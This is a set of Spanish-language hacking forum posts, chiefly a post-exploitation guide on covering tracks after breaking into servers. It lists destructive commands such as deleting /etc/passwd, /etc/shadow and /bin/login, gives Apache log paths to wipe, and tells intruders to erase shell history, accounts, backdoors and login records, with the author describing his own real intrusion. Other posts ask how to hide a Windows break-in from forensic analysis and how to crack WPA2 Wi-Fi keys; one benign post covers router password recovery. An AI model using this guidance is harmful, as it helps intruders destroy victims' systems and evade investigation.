    Una vez tenemos a nuestra disposición una maquina en un segmento de red, podremos hacer uso de dicha maquina para comprometer alguna otra a la que se pueda acceder desde la maquina comprometida, los beneficios de utilizar una maquina intermedia que nos sirva para penetrar en otras maquinas conectadas a está dependen de los objetivos planteados en el proceso de pre-explotacion y sobre la información que deseamos obtener.
    Es frecuente penetrar en una red determinada por medio de las maquinas mas vulnerables con el único objetivo de comprometer una determinada maquina que nos interese y a la cual no tenemos acceso (por ejemplo maquinas en una intranet o red privada), ya sea por la información que disponga o por cualquier otra razón, en cualquier caso, es importante limpiar siempre los rastros de nuestras acciones con el objetivo de no ser vinculados posteriormente con la explotación de una(s) determinada(s) vulnerabilidad(es)

    2 Eliminar Rastro y Huellas Post-Exploitation


    ________________________________________

    Existen tantos tipos de huellas, como tipos de ataques realizados.

    Lo primero que hay que tener en cuenta, es qué hicimos, y como nos pueden cojer.

    Para entrar a robar a una casa, puede tirarse la puerta a patadas, utilizar una palanca (Fuerza Bruta), Ganzuas... En el primer caso hay que recomponer la puerta, en el seguro repararla, en el tercero, deshacerse de las ganzuas.
    Esto no implica que no queden otros rastros.

    Existen muchos tipos de herramientas, backdoors, sniffers para capturar datos, logs de acceso de Apache u otros servicios (daemons)...

    Muchos "Hackers" se limitan a eliminar los access_logs del apache, destruir webshells y backdoors, y root exploit's (Lo cual olvidé en mi último relato, por lo que supieron de la actividad, aunque no conocen su autor), y la cosa no es así.

    Si creamos un usuario, no bastaría con eliminar la cuenta... ¿Cómo creaste el usuario? ¿Mediante comandos?

    El fin de esta guía no es realizar el ataque perfecto, sino más bien una orientación.
    Existen multitud de herramientas, tales como Zappers que afirman eliminar todo rastro... Cuando esto no es así.

    Daremos un repaso por los medios más utilizados.


    A) Destrucción del sistema
    A-1) Esto ocurre cuando la evidencia es tal, que no queda otro remedio.

    La forma más común, almenos en mi caso, seria inhabilitar el login, y causar un tal destrozo que el único medio sea la destrucción total o parcial. He aquí algunos comandos de interés:
    rm /etc/passwd
    rm /etc/shadow
    rm /bin/login
    rm /bin/rm
    rm /etc/inetd.conf
    killall login


    B) Capturando y eliminando los access log de Apache.
    B-1) Esta opción solo es viable si únicamente realizaste un ataque a nivel Web, por ejemplo, una Webshell

    Los directorios más comunes son:
    apache/logs/error.log
    apache/logs/access.log
    apache/logs/error.log
    apache/logs/access.log
    apache/logs/error.log
    apache/logs/access.log
    etc/httpd/logs/acces_log
    etc/httpd/logs/acces.log
    etc/httpd/logs/error_log
    etc/httpd/logs/error.log
    var/www/logs/access_log
    var/www/logs/access.log
    usr/local/apache/logs/access_log
    usr/local/apache/logs/access.log
    var/log/apache/access_log
    var/log/apache2/access_log
    var/log/apache/access.log
    var/log/apache2/access.log
    var/log/access_log
    var/log/access.log
    var/www/logs/error_log
    var/www/logs/error.log
    usr/local/apache/logs/error_log
    usr/local/apache/logs/error.log
    var/log/apache/error_log
    var/log/apache2/error_log
    var/log/apache/error.log
    var/log/apache2/error.log
    var/log/error_log
    var/log/error.log
    var/log/access_log
    var/log/access_log

    Se puede eliminar con RM, o editar, pero para asegurarse de no dejar nada mal, hacer uso de Tee.


    C) Eliminar el Bash History
    C-1) Si, es algo lógico, que mucha gente olvida...
    C-2) Es tan sencillo como editar y/o eliminar el .bash_history o .sh_history
    C-3) Recordar: Esto se hace JUSTO ANTES de salir.


    D) Eliminar todo rastro de exploits, webshells, sniffers, ...
    D-1) Como comenté, me descubrieron por dejar un Root Exploit. No saben quien fue, pero ahí supongo que seguirá.

    E) Tener cuidado con los cambios en el sistema
    E-1) Este paso es vital. Si hiciste un cambio y te agarran, será peor que si solo realizaste la intrusión, dependiendo del pais en el que residas.


    F) Cuidado con los Backdoors
    F-1) Durante un corto tiempo puede pasar inadvertido, durante más, puede ser descubierto... Más vale prevenir que curar.


    G) Eliminar toda cuenta realizada, sobre todo si tiene permisos de Root
    G-1) No basta con eliminar los permisos de shell (/sh/false)


    H) Cuidado: Si hay alguien más logeado al sistema, puede ser muy peligroso.
    H-1) Pueden capturarte fácilmente, además de rastrearte sin el más minimo problema.


    I) Desconfia de todos. El anonimato implica el silencio absoluto, discreción, y seguridad. Jamás digas "Ataqué X servidor", si hay necesidad, "Ataqué un servidor". Fuera del sistema, si eres buscado, no dudes que te espiarán.
    I-1) No existe proxy seguro, solo muy faciles, faciles, complejos, y extremadamente complejos. Pero no seguros.


    J) Cuidado con el syslog.
    J-1) En ocasiones puede ser más complejo de lo habitual deshacerse de cambios realizados en el.


    K) Comandos de interés:
    - Who: Lista usuarios activos.
    - last: Último inicio de sesión de usuario.
    - ps: Procesos activos.
    - lastcom / hostory: Comandos realizados. Véase apartado C.


    L) Ficheros peligrosos:
    - utmp: Guarda un registro (log) de los usuarios que están utilizando el sistema mientras estan conectados al sistema. Directorios: /var/adm/utmp y /etc/utmp
    - wtmp: Guarda un log cada vez que un usuario se introduce en el sistema o sale del sistema.
    - lastlog: Guarda un log del momento exacto en que un usuario entro por ultima vez.
    - acct o pacct: Registra todos los comandos ejecutados por cada usuario (aunque no registra los argumentos con que dichos comandos fueron ejecutados).

    Espero les sirva de ayuda. Att: Nightcode ::)
#75
Feliz navidad :D. la siguiente pregunta es para que me ayudeis a aclarar unas cosas. Digamos que Penetramos en un sistema con windows Xp o windows 7 utilizando metasploit framework, telnet, o el mismisimo backtrack ya sea por fines divertidos o de obtener información vital. Tras realizar un acceso no deseado a un equipo con Windows y tras garantizarnos próximos acceso a dicho sistema, la idea es dejar el mínimo rastro posible. Esta es una de las tareas más importantes en la post-explotación, la ocultación. Windows guarda una especie de log's o registros del sistema para poder saber qué es lo que está pasando tengo entendido, como se lograria borrar todas esas huellas digitales? hay alguna forma fácil de hacerlo y eliminar todo rastro? para evitar nos descubran a través de un análisis forense informático? y otra pregunta podría la victima tener algun software de monitoreo? y detectar mi presencia como evitarlo? gracias de antemano a todos espero sus respuestas =) :D
#76
para los que olvidaron sus contraseñas del router la forma basica de recuperarlas son:

Opción 1: Recuperar la clave del router desde el navegador

En Firefox, ve a Opciones > Seguridad > Contraseñas guardadas y busca la dirección de tu router. Después, pulsa Mostrar contraseñas para ver cuál tienes guardada.

Contraseñas de Firefox

En Google Chrome, ve a Opciones > Mostrar opciones avanzadas y haz clic en Administrar contraseñas guardadas. Escribe la IP de tu router en el buscador y después pulsa Mostrar para ver la contraseña guardada.

Contraseñas en Chrome

Internet Explorer no te permite ver las contraseñas guardadas por sí mismo. En su lugar puedes usar IE Pass view, un sencillo programa portable.

IE Pass View

Opción 2: Con RouterPassView

NirSoft, los mismos creadores de IE PassView, tienen otro programa que se especializa en recuperar claves de routers, se llama RouterPassView.

RouterPassView te da dos formas de obtener la contraseña: tomándola desde la ventana de Internet Explorer (si está guardada) o extrayéndola de un archivo de configuración del router. Por ello, requiere que hayas hecho una copia de seguridad de la configuración de tu router y la mantengas en tu PC.

RouterPassView

RouterPassView funciona descifrando las claves guardadas en estos archivos de configuración, y a veces falla. La lista de routers compatibles está disponible en su página web.

Opción 3: Con las contraseñas predefinidas

No es un secreto que la mayoría de los routers se acceden con el usuario y contraseña "admin": los fabricantes no tienen demasiada imaginación.

¿Pero cuál es el usuario y la contraseña por defecto de tu router? Normalmente lo pone en el manual de usuario, pero si eres incapaz de encontrarla, hay páginas como RouterPasswords que recopilan usuarios y contraseñas para todo tipo de modelos.

RouterPasswords

También encontrarás una lista de usuarios y contraseñas en la página web de Simple Port Forwarding: un programa para abrir puertos en el router fácilmente del que ya te hablamos hace tiempo.



El problema es si cambiaste la contraseña. En tal caso, los routers suelen tener un botón de reset que devuelve su configuración a los valores de fábrica, pero consulta antes de hacerlo con tu proveedor de Internet: podría desconfigurarte Internet también.
#77
Wireless en Windows / Acrilic wifi:
28 Diciembre 2013, 13:15 PM
un cordial saludo a toda la comunidad de elhacker.net el siguiente post es referente al hackeo de redes wifi con seguridad wpa2-psk: eh tratado de utilizar el acrylic wifi en conjunto con un capturador de paquetes como Network monitor la cosa esta en que al configurar intento captar los paquetes y todo perfecto pero a la hora de descifrar las claves no logro decodificar las contraseñas pasan 3 y 4 horas y nada de nada es mas solo parece que capturara datos solamente. soy nuevo con lo de hackear redes wifi lo hago solo por aprender algo mas no quiero ingresar a ellas solo decodificar. sera que habra algun programa mejor que me puedas recomendar ademas del aircrack :S o sera que tarda tanto porque las contraseñas con ese tipo de seguridad cambian cada cierto tiempo automaticamente? de antemano feliz navidad a todos  ;-)